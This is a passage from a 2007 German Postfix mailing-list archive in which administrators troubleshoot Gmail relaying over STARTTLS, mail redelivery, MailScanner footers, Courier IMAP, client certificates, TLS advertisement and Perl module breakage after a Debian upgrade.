delay=33, delays=0.07/33/0.38/0.06, dsn=5.7.0, status=bounced (host smtp.gmail.com[209.85.135.109] said: 530 5.7.0 Must issue a STARTTLS command first w5sm20500749mue (in reply to MAIL FROM command)) Setze ich, wie du schriebst smtp: vor [smtp.gmail.com]:587 erhalte ich nur: Nov 7 16:46:04 daisy postfix/smtp[14385]: fatal: valid hostname or network address required in server description: smtp:[smtp.gmail.com]:587 Nov 7 16:46:05 daisy postfix/master[8357]: warning: process /usr/lib/postfix/smtp pid 14385 exit status 1 Nov 7 16:46:05 daisy postfix/master[8357]: warning: /usr/lib/postfix/smtp: bad command startup -- throttling Nov 7 16:46:05 daisy postfix/qmgr[14371]: warning: private/smtp socket: malformed response Nov 7 16:46:05 daisy postfix/qmgr[14371]: warning: transport smtp failure -- see a previous warning/fatal/panic logfile record for the problem description Nov 7 16:46:05 daisy postfix/error[14386]: 5371C637BF: to=, relay=none, delay=1.1, delays=0.07/1/0/0.01, dsn=4.3.0, status=deferred (unknown mail transport error) auch SASL_README.html und postconf.5.html#relay_transport haben mich jetzt auch nicht wirklich weitergebracht :/ -- Greetings Chris From stefan.kugler at aon.at Wed Nov 7 17:40:03 2007 From: stefan.kugler at aon.at (Stefan Kugler) Date: Wed, 07 Nov 2007 17:40:03 +0100 Subject: [Postfixbuch-users] Mails erneut zustellen Message-ID: <4731EA63.6030501@aon.at> Liebe Leute! Wir haben hier durch einen Konfigurationsfehler mit Catch-All rund 200 Mails in ein Postfach (Cyrus) zusammenbekommen. Gibt es eine einfache Möglichkeit, diese nochmals an postfix zu übergeben und richtig zustellen zu lassen? Vielen Dank! Grüße, Stefan From mailinglists at matthias-balke.de Wed Nov 7 18:11:05 2007 From: mailinglists at matthias-balke.de (Matthias Balke) Date: Wed, 7 Nov 2007 18:11:05 +0100 Subject: [Postfixbuch-users] spam an eine Mailadresse weiterleiten In-Reply-To: <1194434960.6736.7.camel@knecht-ruprecht> References: <20071107093229.267620@gmx.net> <47318D3E.8050805@helmholtz-hzi.de> <47318FA2.3060401@linuxrocks.dyndns.org> <1194434960.6736.7.camel@knecht-ruprecht> Message-ID: <40B3679B-A539-4295-97E8-7AD9468536D6@matthias-balke.de> Hallo ich hätte auch interesse an diesem Script, vielleicht könntest du es einfach irgendwo hochladen und den link hier posten, dann muss nicht jeder der es haben will ne mail schreiben :D vielen Dank schon mal im Vorraus matthias > > Ich stelle die Scripte gerne zur Verfügung. > > ciao > chris > > -- > Christian Wally > Risk Management > Jagdbergstrasse 278 > 6721 Thueringerberg > T: +43-720-737014 > M: +43-699-19439834 > W: http://www.cwrm.at From c.wally at cwrm.at Wed Nov 7 20:33:22 2007 From: c.wally at cwrm.at (Christian Wally) Date: Wed, 07 Nov 2007 20:33:22 +0100 Subject: [Postfixbuch-users] spam an eine Mailadresse weiterleiten In-Reply-To: <40B3679B-A539-4295-97E8-7AD9468536D6@matthias-balke.de> References: <20071107093229.267620@gmx.net> <47318D3E.8050805@helmholtz-hzi.de> <47318FA2.3060401@linuxrocks.dyndns.org> <1194434960.6736.7.camel@knecht-ruprecht> <40B3679B-A539-4295-97E8-7AD9468536D6@matthias-balke.de> Message-ID: <1194464002.5291.3.camel@traveler> Hallo Matthias, On Wed, 2007-11-07 at 18:11 +0100, Matthias Balke wrote: > Hallo ich hätte auch interesse an diesem Script, > > vielleicht könntest du es einfach irgendwo hochladen und den link > hier posten, dann muss nicht jeder der es haben will ne mail > schreiben :D Ich dachte eben auch, dass das eine gute Idee ist und habe den Link schon in meinem Reply an Marcel geschickt ;-) Aber hier gerne nocheinmal: http://www.cwrm.at/index.php?id=83 ciao chris From andreas at it-steiner.com Wed Nov 7 20:30:22 2007 From: andreas at it-steiner.com (Steiner Andreas) Date: Wed, 07 Nov 2007 20:30:22 +0100 Subject: [Postfixbuch-users] Mailscanner Message-ID: <4732124E.4010206@it-steiner.com> Hallo zusammen, ich bin gerade dabei mailscanner bzw. clamav und spamassassin mir anzuschauen. läuft eingentlich soweit schon ganz gut. Ich habe nur ein kleines Problem. Wenn ich ein mail empfange wird vom mailscanner folgender text am ende des mails angehängt. This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. Jedoch sollte laut dem howto das ich habe dieser text auch beim senden eines mails angehängt werden, leider bleibt das bei mir aus. vielleicht kann mir jemand auf die sprünge helfen wo ich einen fehler gemacht habe. Wo kann man diesen angehängten Text ändern ? vielen dank im voraus mfg steiner andreas From armin at townux.ch Wed Nov 7 21:16:12 2007 From: armin at townux.ch (Stoffel Armin) Date: Wed, 07 Nov 2007 21:16:12 +0100 Subject: [Postfixbuch-users] Postfix mit Courier IMAP, Maildrop und Mysql Message-ID: <47321D0C.9020001@townux.ch> Hallo zusammen Ich arbeite mit openSUSE 10.2 und muss noch Courier-Imap und Maildrop installieren. Immer noch mit Hilfe von http://www.2linux.net/postfix-mysql-courier.html Neu hat aber Suse ein courier-authlib paket... habe ich auch installiert. Ich versuche nun Courier IMAP zu kompilieren. Leider habe ich mit folgender Zeile probleme: zusätzlich im Abschnitt "install" noch folgende Zeile hinzufügen: %{_prefix}/lib/courier-imap/authlib/authdaemond.mysql /etc/courier/authmysqlrc.dist Die Datei authdaemond.mysql ist nicht da und die atei ist unter /etc/authlib/authmysqlrc.dist Was mache ich falsch und wo ist die Datei? Gruss Armin From marco at marcomartinez.de Wed Nov 7 21:16:25 2007 From: marco at marcomartinez.de (Marco Estrada Martinez) Date: Wed, 07 Nov 2007 21:16:25 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <200711060827.10514.rainer.frey@inxmail.de> References: <472CC915.3020708@marcomartinez.de> <200711051435.06929.rainer.frey@inxmail.de> <472F5086.5090006@marcomartinez.de> <200711060827.10514.rainer.frey@inxmail.de> Message-ID: <47321D19.4090903@marcomartinez.de> Rainer Frey schrieb: > On Monday 05 November 2007 18:19:02 Marco Estrada Martinez wrote: > >> Rainer Frey schrieb: >> >>> Was meinst du "Mit Client-Zertifikaten eingerichtet"? check_ccert_access >>> verwendet, oder was? >>> >> Ja, genau das, aber mir ist jetzt klar geworden das ich um den client >> gegenüvber dem Server auszuweisen für jeden client eins brauch. Danke >> schonmal dafür. Es würde also bedeuten ... >> Client 1: ZertifikatA -> Ausweisung client <->server >> ZertifikatB -> Digitale Unterschrift >> >> Client : ZertifikatC -> Ausweisung client <->server >> ZertifikatB -> Digitale Unterschrift >> >> Oder? >> > > Nein, nicht unbedingt. Du kannst prinzipiell *ein* Zertifikat in mehreren > Clients sowohl für digitale Signatur als auch für Authentifizierung ggü. > Server verwenden. Ich habe das schon gemacht. Die Unterstützung der Clients > für die Server-Authentifizierung ist allerdings dünn, und ich meine mich an > einen Bug mit Thunderbird 1.5 zu erinnern. Aber es geht. Mein Chef, und ab > und zu auch ich, verwenden das. Wenn du das Problem so lösen *willst* > (organisatorische Gründe könnten für deine obige Variante sprechen), > beantworte doch mal meine Detailfragen in meiner vorherigen Mail. > Hi @ all, zu deiner ersten Frage: Ich habe das Zertifikat auf diesem PC erstellt, weil das mein server ist der auch die CA vorhalt. Nein, ich habe natürlich kein zweiten Schlüssel mit dem gleichen Namen erstellt. Die Fehlermeldung bringt der Thunderbird. Naja ein Zertifikat mit der selben DN gibt es auf jeden Fall, da es ja ein Zertifikat für ein und die selbe Person ist. Liebe Grüße und Danke Marco P.S. Ok ich nutze in diesem Fall den Thunderbird 1.5.0.14pre könnte es daran liegen. Ich soltte es vielleciht mal mit nem anderen Zertifikat ausprobieren. > >>> Gruß >>> Rainer Frey >>> >> THX und liebe Grüße Marco >> > > Gruß > Rainer > > -- Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem folgenden Fingerprint: This mail is digitally signed, it is only valid with the following Fingerprint: MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 3035 bytes Beschreibung: S/MIME Cryptographic Signature URL : From postfixbuch-users at japantest.homelinux.com Wed Nov 7 21:50:39 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Wed, 07 Nov 2007 21:50:39 +0100 Subject: [Postfixbuch-users] smtp_sender_dependent_* + gmail In-Reply-To: <200711071649.22915.kildau-ml@gmx.de> References: <200711071104.37894.kildau-ml@gmx.de> <47319D74.5090004@japantest.homelinux.com> <200711071649.22915.kildau-ml@gmx.de> Message-ID: <4732251F.5030509@japantest.homelinux.com> Chris Cohen wrote: > On Wednesday 07 November 2007 12:11:48 Sandy Drobic wrote: >> /etc/postfix/transport: >> example.com smtp:[mail.example.com]:587 >> >> Genauso auch für den Eintrag in sasl_passwd. Beide müssen übereinstimmen. > > Hmmm.... so richtig blicke ich noch nicht durch. > Ich hab jetzt in transport: > example at gmail.com [smtp.gmail.com]:587 (hab' 2 gmail adressen, deswegen) > > und ich sasl_passwd: > example at gmail.com example:secret > > Ich vermute mal das meintest du mit beide müssen übereinstimmen? > In meinen logs finde ich immernoch: > > Nov 7 16:42:53 daisy postfix/smtp[14315]: 0E8D5637BF: to=, > relay=smtp.gmail.com[209.85.135.109]:587, delay=33, delays=0.07/33/0.38/0.06, > dsn=5.7.0, status=bounced (host smtp.gmail.com[209.85.135.109] said: 530 > 5.7.0 Must issue a STARTTLS command first w5sm20500749mue (in reply to MAIL > FROM command)) "smtp_use_tls = yes" (für ältere Postfix-Versionen) Neuere sollten hiermit dazu gezwungen werden, STARTTLS zu verwenden: smtp_tls_policy_maps = hash:/etc/postfix/tls_policy /etc/postfix/tls_policy: gmail.com encrypt Das sollte Postfix dazu zwingen, alle Verbindungen nach gmail.com nur verschlüsselt aufzubauen. Voraussetzung ist natürlich, dass Postfix in er Lage ist, eine verschlüsstelte Verbindung aufzubauen. Du kannst ja mal überprüfen, ob der smtp-client mit openssl gelinkt ist. ldd /path/to/postfix/smtp | grep ssl ldd /usr/lib/postfix/smtp | grep ssl libssl.so.0.9.8 => /usr/lib/libssl.so.0.9.8 (0xb7e70000) > Setze ich, wie du schriebst smtp: vor [smtp.gmail.com]:587 erhalte ich nur: > > Nov 7 16:46:04 daisy postfix/smtp[14385]: fatal: valid hostname or network > address required in server description: smtp:[smtp.gmail.com]:587 Argh! Gehirnkurzschluss!! In transport hat der Transport natürlich nichts zu suchen. Sorry! :-( -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From postfixbuch-users at japantest.homelinux.com Wed Nov 7 22:00:07 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Wed, 07 Nov 2007 22:00:07 +0100 Subject: [Postfixbuch-users] Mails erneut zustellen In-Reply-To: <4731EA63.6030501@aon.at> References: <4731EA63.6030501@aon.at> Message-ID: <47322757.4060205@japantest.homelinux.com> Stefan Kugler wrote: > Liebe Leute! > > Wir haben hier durch einen Konfigurationsfehler mit Catch-All rund 200 > Mails in ein Postfach (Cyrus) zusammenbekommen. > Gibt es eine einfache Möglichkeit, diese nochmals an postfix zu > übergeben und richtig zustellen zu lassen? cd /path/to/mailbox for i in *\. ; do sendmail -it <$i ; done Dies funktioniert natürlich nur, wenn der "To:" Header besetzt sind. Wenn das nicht der Fall ist, musst du ein Script nehmen, welches den Empfänger aus den Received-Zeilen herausfischt. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From anmeyer at anup.de Wed Nov 7 22:07:42 2007 From: anmeyer at anup.de (Andreas Meyer) Date: Wed, 7 Nov 2007 22:07:42 +0100 Subject: [Postfixbuch-users] Mails erneut zustellen In-Reply-To: <4731EA63.6030501@aon.at> References: <4731EA63.6030501@aon.at> Message-ID: <20071107220742.4dec7461@gamma.meyer.home> Stefan Kugler schrieb: > Liebe Leute! > > Wir haben hier durch einen Konfigurationsfehler mit Catch-All rund 200 > Mails in ein Postfach (Cyrus) zusammenbekommen. > Gibt es eine einfache Möglichkeit, diese nochmals an postfix zu > übergeben und richtig zustellen zu lassen? > > Vielen Dank! > > Grüße, Stefan Ich mach das z.B. mit mini_sendmail #!/bin/sh a= while [ -z "$a" ]; do echo -n "Welchen SPAM: " read a done zcat $a | /usr/local/sbin/mini_sendmail -p10025:localhost -f "support at anup.de" -v -t -- Andreas Meyer Mein öffentlicher GPG-Schlüssel unter: http://gpg-keyserver.de/pks/lookup?search=anmeyer&fingerprint=on&op=index From marco at marcomartinez.de Wed Nov 7 23:07:35 2007 From: marco at marcomartinez.de (Marco Estrada Martinez) Date: Wed, 07 Nov 2007 23:07:35 +0100 Subject: [Postfixbuch-users] [GELOEST] postfix und Clientzertifikate In-Reply-To: <200711060827.10514.rainer.frey@inxmail.de> References: <472CC915.3020708@marcomartinez.de> <200711051435.06929.rainer.frey@inxmail.de> <472F5086.5090006@marcomartinez.de> <200711060827.10514.rainer.frey@inxmail.de> Message-ID: <47323727.4070200@marcomartinez.de> Hi @ all, nun habe ich alle Zertifikate nochmal gelösch und nun geht es ???? Nun habe ich nur ein Clientzertifikat für alle (drei) Clients. So soll es sein. Kann zwar jetzt nicht ganz genau nachvollziehen warum das nun klappt aber scheint doch irgendwas damit zutu zuhaben das er (Thunderbird) zwei zertifikate hatte. Trotzdem tausend Dank an alle. Liebe Grüße Marco -- Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem folgenden Fingerprint: This mail is digitally signed, it is only valid with the following Fingerprint: MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 3035 bytes Beschreibung: S/MIME Cryptographic Signature URL : From p.heinlein at heinlein-support.de Wed Nov 7 23:11:51 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Wed, 7 Nov 2007 23:11:51 +0100 Subject: [Postfixbuch-users] Mailscanner In-Reply-To: <4732124E.4010206@it-steiner.com> References: <4732124E.4010206@it-steiner.com> Message-ID: <200711072311.52030.p.heinlein@heinlein-support.de> Am Mittwoch, 7. November 2007 schrieb Steiner Andreas: > Jedoch sollte laut dem howto das ich habe dieser text auch beim senden > eines mails angehängt werden, leider > bleibt das bei mir aus. Nicht "leider". Zum Glück. (Sorry, ich würde Dir trotzdem helfen, weiß es aber wirklich nicht, da ich mit Mailscanner nix zu tun habe. Aber bitte: Es gibt nichts sinnloseres also diese Pseudosicherheitstexte, die im Zweifelsfall sogar kontraproduktiv sind und die Sicherheit gefährden.) Lieben Gruß Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From p.heinlein at heinlein-support.de Wed Nov 7 23:12:42 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Wed, 7 Nov 2007 23:12:42 +0100 Subject: [Postfixbuch-users] Postfix mit Courier IMAP, Maildrop und Mysql In-Reply-To: <47321D0C.9020001@townux.ch> References: <47321D0C.9020001@townux.ch> Message-ID: <200711072312.42265.p.heinlein@heinlein-support.de> Am Mittwoch, 7. November 2007 schrieb Stoffel Armin: > Ich arbeite mit openSUSE 10.2 und muss noch Courier-Imap und Maildrop > installieren. > Immer noch mit Hilfe von > http://www.2linux.net/postfix-mysql-courier.html Warum nimmst Du nicht die fertigen RPM-Pakete? Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From p.heinlein at heinlein-support.de Wed Nov 7 23:14:21 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Wed, 7 Nov 2007 23:14:21 +0100 Subject: [Postfixbuch-users] Mails erneut zustellen In-Reply-To: <4731EA63.6030501@aon.at> References: <4731EA63.6030501@aon.at> Message-ID: <200711072314.21761.p.heinlein@heinlein-support.de> Am Mittwoch, 7. November 2007 schrieb Stefan Kugler: > Wir haben hier durch einen Konfigurationsfehler mit Catch-All rund 200 > Mails in ein Postfach (Cyrus) zusammenbekommen. > Gibt es eine einfache Möglichkeit, diese nochmals an postfix zu > übergeben und richtig zustellen zu lassen? Beim Courier wäre das jetzt ein wunderschöner Anwendungszweck für das Outbox-Feature... (Nur für's Protokoll und die Courier-Admins unter uns.) Gruß Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From jk at jkart.de Wed Nov 7 23:48:43 2007 From: jk at jkart.de (Jim Knuth) Date: Wed, 07 Nov 2007 23:48:43 +0100 Subject: [Postfixbuch-users] Riesiger Perl Fehler nach Upgrade In-Reply-To: <4731CD3A.5080407@spam-fetish.org> References: <4731220D.30806@jkart.de> <20071107073136.GC8168@state-of-mind.de> <47319FB6.2050308@jkart.de> <20071107115742.GA12976@state-of-mind.de> <4731A929.3010107@jkart.de> <42151.80.87.162.117.1194437617.squirrel@aachalon.de> <4731BD5D.5040500@spam-fetish.org> <4731CD3A.5080407@spam-fetish.org> Message-ID: <473240CB.1050006@jkart.de> Muenz, Michael schrieb: > Muenz, Michael schrieb: >>>> ja, danke. Wo sind die? >>> Bei Debian?: >>> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=443262 >> Hab jetzt auch das Problem. Hab auch ziemlich viele Module >> ueber CPAN installiert und die nicht von Debian genommen. >> Allerdings: Auf einem System hab ich "cpan" und dann ein >> "upgrade" ausgefuehrt, alle Module aktualisiert, und erst >> anschliessend die anstehenden Debianpakete aktualisiert. >> Fazit: Alles startet ganz normale. Beim anderen System hab >> ichs nicht gemacht und Schwupps, selbe Meldung wie im >> Bugreport. >> >> Gibts schon nen einfachen Workaround? > > Also, bei mir hats so dann funktioniert: ja, so gings. Danke. P.S. Das ist ja ne schöne Schei**e, die da passiert ist. > > cd /usr/local/share/perl/5.8.8/ > mv LWP __LWP > mv LWP.pm __LWP.pm > mv Errno.pm __Errno.pm > cpan > upgrade > > Dann sind alle Module wieder aktuell und LWP und Errno > neu installiert. Amavis startet auch wieder problemlos ... > > Michael -- mit freundlichen Gruessen - with kind regard Jim Knuth #ICQ 277289867 From christian at bricart.de Thu Nov 8 08:35:37 2007 From: christian at bricart.de (Christian Bricart) Date: Thu, 08 Nov 2007 08:35:37 +0100 Subject: [Postfixbuch-users] OT: Re: Mailscanner In-Reply-To: <200711072311.52030.p.heinlein@heinlein-support.de> References: <4732124E.4010206@it-steiner.com> <200711072311.52030.p.heinlein@heinlein-support.de> Message-ID: <4732BC49.2050003@bricart.de> Peer Heinlein wrote: > Am Mittwoch, 7. November 2007 schrieb Steiner Andreas: > > >> Jedoch sollte laut dem howto das ich habe dieser text auch beim senden >> eines mails angehängt werden, leider >> bleibt das bei mir aus. > > Nicht "leider". > > Zum Glück. > > > (Sorry, ich würde Dir trotzdem helfen, weiß es aber wirklich nicht, da ich > mit Mailscanner nix zu tun habe. Aber bitte: Es gibt nichts sinnloseres > also diese Pseudosicherheitstexte, die im Zweifelsfall sogar > kontraproduktiv sind und die Sicherheit gefährden.) SCNR Meinst du stattdessen sowas (hatte glaub ich Ralf mal als Fortune-Sig): >>> IMPORTANT - ANTI-DISCLAIMER - This email is not and cannot, by its nature, be confidential. En route from me to you, it will pass across the public Internet, easily readable by any number of system administrators along the way. If you have received this message by mistake, it would be ridiculous for me to tell you not to read it or copy to anyone else, because, let's face it, if it's a message revealing confidential information or that could embarrass me intensely, that's precisely what you'll do. Who wouldn't? Likewise, it is superfluous for me to claim copyright in the contents, because I own that anyway, even if you print out a hard copy or disseminate this message all over the known universe. I don't know why so many corporate mail servers feel impelled to attach a disclaimer to the bottom of every email message saying otherwise. If you don't know either, why not email your corporate lawyers and system administrators and ask them why they insist on contributing so much to the waste of bandwidth? To say nothing of making the presence of your mail on public discussions or mailinglists of explicitly contratictory nature. May as well just delete it, eh? Oh, and this message is probably plagued with viruses as well. <<< Christian From brunhilde at siebenwind.de Thu Nov 8 08:43:15 2007 From: brunhilde at siebenwind.de (brunhilde at siebenwind.de) Date: Thu, 8 Nov 2007 08:43:15 +0100 (CET) Subject: [Postfixbuch-users] Postfix und das Liebe TLS Message-ID: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> Hi, irgendwie habe ich ein kleines TLS Problem. Ich habe auch schon die Mailingliste durchgesucht, aber konnte in meinen Einstellungen keinen Fehler finden. Es ist eigentlich alles erforderliche so wie es auch hier in der Mailingliste all zu oft steht vorhanden. Vielleicht könnt ihr ja helfen. Also, ich bekomme folgende Fehlermeldung beim Senden einer E-Mail mit TLS (Abrufen über Courier funktioniert): Senden der Nachricht fehlgeschlagen. Fehler beim Senden der Nachricht: Es konnte nicht per STARTTLS mit dem SMTP-Server mail.domain.tld Kontakt aufgenommen werden, da er STARTTLS nicht in Verbindung mit EHLO unterstützt. Bitte überprüfen bzw. korrigieren Sie nochmal die Servereinstellungen. .... Meine Postfix main.cf (Mal nur den TLS Bereich, falls mehr gebraut anfiepsen): # Server Side TLS smtpd_use_tls = yes smtpd_tls_key_file = /etc/postfix/ssl/mail.key smtpd_tls_cert_file = /etc/postfix/ssl/mail.crt smtpd_tls_CAfile = /etc/postifx/ssl/smtpd.pem smtpd_tls_loglevel = 1 smtpd_tls_receive_header = yes smtpd_tls_session_cache_timeout = 3600s #CLient side TLS smtp_use_tls = no smtp_tls_key_file = /etc/postfix/ssl/mail.key smtp_tls_cert_file = /etc/postfix/ssl/mail.crt smtp_tls_CAfile = /etc/postfix/ssl/smtpd.pem smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache LG BruniGunde From p at state-of-mind.de Thu Nov 8 08:53:29 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Thu, 8 Nov 2007 08:53:29 +0100 Subject: [Postfixbuch-users] Postfix und das Liebe TLS In-Reply-To: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> References: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> Message-ID: <20071108075329.GB3849@state-of-mind.de> * brunhilde at siebenwind.de : > Hi, > > irgendwie habe ich ein kleines TLS Problem. Ich habe auch schon die > Mailingliste durchgesucht, aber konnte in meinen Einstellungen keinen > Fehler finden. Es ist eigentlich alles erforderliche so wie es auch hier > in der Mailingliste all zu oft steht vorhanden. Vielleicht könnt ihr ja > helfen. > > Also, ich bekomme folgende Fehlermeldung beim Senden einer E-Mail mit TLS > (Abrufen über Courier funktioniert): > > Senden der Nachricht fehlgeschlagen. > Fehler beim Senden der Nachricht: Es konnte nicht per STARTTLS mit dem > SMTP-Server mail.domain.tld Kontakt aufgenommen werden, da er STARTTLS > nicht in Verbindung mit EHLO unterstützt. Bitte überprüfen bzw. > korrigieren Sie nochmal die Servereinstellungen. Zeig mal eine Telnet-Session zu Deinem Server. telnet mail.domain.tld 25 ... EHLO client.domain.tld ... QUIT p at rick > > .... > > Meine Postfix main.cf (Mal nur den TLS Bereich, falls mehr gebraut > anfiepsen): > > # Server Side TLS > smtpd_use_tls = yes > smtpd_tls_key_file = /etc/postfix/ssl/mail.key > smtpd_tls_cert_file = /etc/postfix/ssl/mail.crt > smtpd_tls_CAfile = /etc/postifx/ssl/smtpd.pem > smtpd_tls_loglevel = 1 > smtpd_tls_receive_header = yes > smtpd_tls_session_cache_timeout = 3600s > > #CLient side TLS > smtp_use_tls = no > smtp_tls_key_file = /etc/postfix/ssl/mail.key > smtp_tls_cert_file = /etc/postfix/ssl/mail.crt > smtp_tls_CAfile = /etc/postfix/ssl/smtpd.pem > smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache > > LG > BruniGunde > > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From brunhilde at siebenwind.de Thu Nov 8 09:05:28 2007 From: brunhilde at siebenwind.de (brunhilde at siebenwind.de) Date: Thu, 8 Nov 2007 09:05:28 +0100 (CET) Subject: [Postfixbuch-users] Postfix und das Liebe TLS In-Reply-To: <20071108075329.GB3849@state-of-mind.de> References: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> <20071108075329.GB3849@state-of-mind.de> Message-ID: <1581.79.214.195.187.1194509128.squirrel@mail.siebenwind.de> Hi, folgendes kam bei der Telnet Session heraus: 220 mx-mailer.domain.tld ESMTP (Banner v2.0) 250-mx-mailer.domain.tld 250-PIPELINING 250-SIZE 30480000 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH DIGEST-MD5 CRAM-MD5 LOGIN PLAIN 250-AUTH=DIGEST-MD5 CRAM-MD5 LOGIN PLAIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN >> Hi, >> >> irgendwie habe ich ein kleines TLS Problem. Ich habe auch schon die >> Mailingliste durchgesucht, aber konnte in meinen Einstellungen keinen >> Fehler finden. Es ist eigentlich alles erforderliche so wie es auch hier >> in der Mailingliste all zu oft steht vorhanden. Vielleicht könnt ihr ja >> helfen. >> >> Also, ich bekomme folgende Fehlermeldung beim Senden einer E-Mail mit >> TLS >> (Abrufen über Courier funktioniert): >> >> Senden der Nachricht fehlgeschlagen. >> Fehler beim Senden der Nachricht: Es konnte nicht per STARTTLS mit dem >> SMTP-Server mail.domain.tld Kontakt aufgenommen werden, da er STARTTLS >> nicht in Verbindung mit EHLO unterstützt. Bitte überprüfen bzw. >> korrigieren Sie nochmal die Servereinstellungen. > > Zeig mal eine Telnet-Session zu Deinem Server. > > telnet mail.domain.tld 25 > ... > EHLO client.domain.tld > ... > QUIT > > > p at rick > > > >> >> .... >> >> Meine Postfix main.cf (Mal nur den TLS Bereich, falls mehr gebraut >> anfiepsen): >> >> # Server Side TLS >> smtpd_use_tls = yes >> smtpd_tls_key_file = /etc/postfix/ssl/mail.key >> smtpd_tls_cert_file = /etc/postfix/ssl/mail.crt >> smtpd_tls_CAfile = /etc/postifx/ssl/smtpd.pem >> smtpd_tls_loglevel = 1 >> smtpd_tls_receive_header = yes >> smtpd_tls_session_cache_timeout = 3600s >> >> #CLient side TLS >> smtp_use_tls = no >> smtp_tls_key_file = /etc/postfix/ssl/mail.key >> smtp_tls_cert_file = /etc/postfix/ssl/mail.crt >> smtp_tls_CAfile = /etc/postfix/ssl/smtpd.pem >> smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache >> >> LG >> BruniGunde From kildau-ml at gmx.de Thu Nov 8 09:21:05 2007 From: kildau-ml at gmx.de (Chris Cohen) Date: Thu, 8 Nov 2007 09:21:05 +0100 Subject: [Postfixbuch-users] smtp_sender_dependent_* + gmail In-Reply-To: <4732251F.5030509@japantest.homelinux.com> References: <200711071104.37894.kildau-ml@gmx.de> <200711071649.22915.kildau-ml@gmx.de> <4732251F.5030509@japantest.homelinux.com> Message-ID: <200711080921.05459.kildau-ml@gmx.de> On Wednesday 07 November 2007 21:50:39 Sandy Drobic wrote: > [...] > Neuere sollten hiermit dazu gezwungen werden, STARTTLS zu verwenden: > > smtp_tls_policy_maps = hash:/etc/postfix/tls_policy > > /etc/postfix/tls_policy: > gmail.com encrypt > > Das sollte Postfix dazu zwingen, alle Verbindungen nach gmail.com nur > verschlüsselt aufzubauen. Voraussetzung ist natürlich, dass Postfix in er > Lage ist, eine verschlüsstelte Verbindung aufzubauen. Du kannst ja mal > überprüfen, ob der smtp-client mit openssl gelinkt ist. > > ldd /path/to/postfix/smtp | grep ssl > > ldd /usr/lib/postfix/smtp | grep ssl > libssl.so.0.9.8 => /usr/lib/libssl.so.0.9.8 (0xb7e70000) > Viele viele Fehlermeldungen und Zertifikategenerierungen später... es funktioniert :) Ich glaub, ich muss mich dann bei Gelegenheit mal in OpenSSL und Zertifikate generell einlesen... > > Setze ich, wie du schriebst smtp: vor [smtp.gmail.com]:587 erhalte ich > > nur: > > > > Nov 7 16:46:04 daisy postfix/smtp[14385]: fatal: valid hostname or > > network address required in server description: smtp:[smtp.gmail.com]:587 > > Argh! Gehirnkurzschluss!! In transport hat der Transport natürlich nichts > zu suchen. Sorry! :-( :) -- Greetings Chris From ah at ordix.de Thu Nov 8 11:06:06 2007 From: ah at ordix.de (Alexander Hochhalter) Date: Thu, 08 Nov 2007 11:06:06 +0100 Subject: [Postfixbuch-users] lmtp ... read timeout In-Reply-To: <200711061809.35681.ml@awinkelmann.de> References: <47307AF5.7010705@ordix.de> <200711061809.35681.ml@awinkelmann.de> Message-ID: <4732DF8E.5000104@ordix.de> Andreas Winkelmann schrieb: > On Dienstag, 6. November 2007, Alexander Hochhalter wrote: > > >> ich habe seit 2004 ein Imap Server am laufen, der hat auch brav sein >> Dienst verrichtet. >> Seit paar Woche bekomme ich immer öfters folgender Fehler: >> >> /var/log/mail: >> postfix/lmtp[3692]: EF0F4A6E80: to= ... , status=deferred (connect to >> public/lmtp[public/lmtp]: read timeout) >> >> Die Emails sammeln sich dann in der Mailq. >> >> postqueue -f >> und >> rccyrus restart >> >> bringen dann alles wieder für paar Tagen in Ordnung. >> >> Was kann man dagegen machen und woher kommt der Fehler beim lmtp >> > > Was sagt das Log vom Cyrus-Imapd? > hat sich erledigt mit dem Update auf cyrus-imapd-2.2.3-83.35 danke gruß alex -------------- 